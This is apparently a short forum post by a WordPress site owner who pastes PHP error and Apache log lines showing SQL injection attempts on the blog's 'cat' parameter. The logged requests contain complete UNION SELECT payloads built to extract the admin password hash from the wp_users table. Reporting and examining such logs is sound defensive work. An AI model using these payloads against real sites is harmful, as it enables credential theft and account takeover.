I just noticed this in my php_error.txt file:
[16-Jun-2008 16:09:13] WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''xyz''' at line 1] SELECT * FROM wp_users WHERE user_login = 'xyz''
and I have this in my apache log file
87.118.112.44 - - [16/Jun/2008:16:09:14 +0100] "GET /steve/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 38526 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
87.118.112.44 - - [16/Jun/2008:16:09:16 +0100] "GET /steve/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 38526 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"